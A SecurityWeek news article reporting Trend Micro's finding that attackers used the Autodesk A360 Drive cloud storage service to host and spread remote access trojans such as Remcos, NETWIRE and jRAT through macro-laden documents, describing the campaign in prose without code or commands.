Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cloud Security

Autodesk A360 Drive Used to Spread Malware

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Cloud-based online storage service Autodesk A360 Drive has been recently abused as a malware delivery platform, according to Trend Micro.

Functioning in a manner similar to that of cloud storage services such as Google Drive, A360 Drive allows a user to create an account for free and benefit from 5 gigabytes of storage space. The service is part of the Autodesk A360 cloud-based workspace, which allows design and engineering teams to share information to desktops, web, and mobile devices.

On A360 Drive, anyone can upload documents via a browser or desktop, and can also share these files by inviting people to view or edit them. Thus, all that a cybercriminal needs to do to abuse the service is to create an account, upload malicious content, and then embed URLs to this content in the chosen entry vector.

In fact, this is exactly what Trend Micro discovered has happened. Miscreants uploaded a plethora of malware to A360 Drive and started spreading it via macro-enabled Microsoft Word documents and other types of files.

One A360 Drive-hosted archive, the security firm says, included an executable (.EXE) file embedded with an obfuscated Visual Basic file hiding a Zeus/Zbot KINS variant beneath. One Java ARchive (JAR) file discovered on the platform contained an executable file archive that pointed to a variant of the NETWIRE remote access tool.

Another JAR file was found to be a variant of jRAT/Adwind, a piece of malware that can retrieve and exfiltrate a variety of data, including credentials, keystrokes, and multimedia files.

According to Trend Micro, some of the files were hosted via A360 Drive since June 2017, but the practice only surged in August. These files usually contained remote access tools, either obfuscated EXE files or Java archives, and haven’t been used in targeted attacks to date.

When it comes to the global distribution of the observed malware, the U.S., South Africa, France, Italy, Germany, Hong Kong, and Austria emerge as the most affected countries.

Advertisement. Scroll to continue reading.

One of the analyzed files was an Office DOC document called AMMO REQUEST MOD Turkey.doc, which was uploaded to VirusTotal on August 24 and was distributed during the same period. Malicious macros included in the document were pointing to a PowerShell script designed to download a file from A360 Drive and execute it.

The downloaded payload, a Visual Basic obfuscated executable file, was found to be the Trojanized version of the Remcos remote access tool (RAT), which is advertised, sold, and offered cracked on various websites and forums. The malware was being distributed mainly in European countries such as Croatia, Germany, Greece, and Turkey.

Remcos made headlines in February, but it has been used in attacks since 2016. Recently, the RAT has been distributed via a malicious PowerPoint slideshow embedded with an exploit for CVE-2017-0199. In March, the same tool was found on endpoints infected with the MajikPOS point-of-sale (PoS) malware. Apparently, it was used as MajikPOS’s entry point.

“Securing the use of legitimate system administration tools like PowerShell helps mitigate threats and restrict them from being abused. Cloud-based storage platforms are known for being abused, too, and its misuse often allows malicious artifacts into the workplace’s machines. This can be prevented by ensuring that web traffic is scanned within the enterprise,” Trend Micro notes.

The security firm informed Autodesk on its findings and says they have been working together in taking “down the abused URLs and deploying additional countermeasures to prevent further abuse of A360 Drive.”

Related: PowerPoint Slide Show Files Used to Install Malware

Related: Easy-to-Use Remcos RAT Spotted in Live Attacks

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

CISO Conversations

SecurityWeek talks to Billy Spears, CISO at Teradata (a multi-cloud analytics provider), and Lea Kissner, CISO at cloud security firm Lacework.

Cloud Security

Cloud security researcher warns that stolen Microsoft signing key was more powerful and not limited to Outlook.com and Exchange Online.

CISO Strategy

Okta is blaming the recent hack of its support system on an employee who logged into a personal Google account on a company-managed laptop.

Malware & Threats

The NSA and FBI warn that a Chinese state-sponsored APT called BlackTech is hacking into network edge devices and using firmware implants to silently...

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...